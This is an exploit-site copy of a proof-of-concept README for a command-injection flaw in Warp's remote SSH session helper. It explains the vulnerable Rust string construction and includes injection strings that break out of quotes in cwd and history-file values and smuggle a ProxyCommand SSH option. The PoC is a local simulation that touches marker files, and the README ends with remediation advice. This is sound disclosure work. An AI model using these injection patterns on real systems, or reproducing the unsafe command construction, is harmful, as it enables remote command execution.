Exploit for CVE-2026-54686

Name: Exploit for CVE-2026-54686
Rating: 5 (9 reviews)
2026-06-16 | CVSS 6.1
## https://sploitus.com/exploit?id=29D0989A-B7ED-56AD-B27C-E3D705F08F97
# CVE-2026-54686: Warp Remote SSH Command Injection PoC

## Description

This repository contains a Proof of Concept (PoC) for **CVE-2026-54686**, a command injection issue in **Warp** remote SSH session helper command handling.

Affected code paths used values learned from a remote SSH session when constructing shell commands or local SSH command lines. If those values contain shell metacharacters or injected SSH options, an attacker-controlled remote host can influence Warp background commands and cause unintended command execution.

This PoC is a safe local simulation. It does not connect to Warp or to any SSH server. It reproduces the vulnerable string construction patterns and uses marker files under `/tmp` to show whether the injected command would execute.

**Discovered by: saku0512** ([GitHub](https://github.com/Saku0512))

## Disclaimer

This project is for educational and ethical security testing purposes only.

The author is not responsible for any misuse, damage, or illegal activities caused by this tool. Unauthorized access to computer systems is illegal. By using this software, you agree to use it only in environments where you have explicit permission to conduct security testing.

## Vulnerability Details

- **CVE ID**: CVE-2026-54686
- **Type**: OS Command Injection / SSH Option Injection
- **Weakness**: CWE-78
- **Impact**: Remote command execution on the connected SSH host and potential local command execution through injected SSH options
- **Affected Component**:
  - `RemoteCommandExecutor`
  - SSH session history processing
  - SSH transport control socket handling

## Root Cause

### 1. Remote cwd command injection

The remote current working directory was placed inside single quotes without escaping embedded single quote characters:

```rust
command_str.push_str(&format!("cd '{current_directory_path}' && "));
```

If `current_directory_path` contains a value such as:

```text
/tmp/warp-cve-2026-54686'; touch /tmp/warp_cve_2026_54686_cwd_confirmed; echo '
```

the generated helper command becomes:

```bash
cd '/tmp/warp-cve-2026-54686'; touch /tmp/warp_cve_2026_54686_cwd_confirmed; echo '' && pwd
```

The injected `touch` command is interpreted by the shell as a separate command.

### 2. Remote history file command injection

The remote history file path was interpolated into a shell command without quoting:

```rust
format!("cat {history_file}")
```

If `history_file` contains shell syntax such as:

```text
/tmp/history; touch /tmp/warp_cve_2026_54686_history_confirmed; #
```

the generated command runs the injected command after `cat`.

### 3. SSH option injection through ControlPath

The SSH control socket path was used to build an SSH option:

```rust
format!("ControlPath={}", socket_path.display())
```

If this value is later used in an unsafe command-line construction path, a value such as:

```text
/tmp/socket -o ProxyCommand='touch /tmp/warp_cve_2026_54686_ssh_option_confirmed'
```

can introduce an additional SSH option. This PoC models that unsafe tokenization locally with a fake SSH parser and does not invoke the real `ssh` binary.

## Proof of Concept (Usage)

### 1. Environment Setup

Ensure you have Python 3 installed:

```bash
python3 --version
```

### 2. Run All Vulnerable Simulations

```bash
python3 poc.py
```

Expected output includes success messages for the marker files:

```text
[!] SUCCESS: /tmp/warp_cve_2026_54686_cwd_confirmed was created.
[!] SUCCESS: /tmp/warp_cve_2026_54686_history_confirmed was created.
[!] SUCCESS: /tmp/warp_cve_2026_54686_ssh_option_confirmed was created.
```

### 3. Run Individual Cases

Remote cwd injection:

```bash
python3 poc.py --case cwd
```

Remote history file injection:

```bash
python3 poc.py --case history
```

SSH option injection simulation:

```bash
python3 poc.py --case ssh-option
```

### 4. Patched Behavior Simulation

Run the fixed builders:

```bash
python3 poc.py --mode fixed
```

The fixed simulation quotes or escapes attacker-controlled values, so the marker files should not be created.

## Verification

Check for marker files after running the vulnerable simulation:

```bash
ls -l /tmp/warp_cve_2026_54686_*_confirmed
```

Clean up marker files:

```bash
rm -f /tmp/warp_cve_2026_54686_*_confirmed
```

## Remediation

Use structured argument APIs where possible and avoid constructing shell commands from remote-controlled strings.

When a shell command is unavoidable, quote each untrusted value for the exact shell context where it will be used. For single-quoted POSIX shell strings, escape embedded single quotes before interpolation. For paths passed to local SSH options, validate them as paths and keep each option as a single structured argument instead of rebuilding a shell command string.

## References

- [Warp GitHub](https://github.com/warpdotdev/warp)
- [CWE-78: Improper Neutralization of Special Elements used in an OS Command](https://cwe.mitre.org/data/definitions/78.html)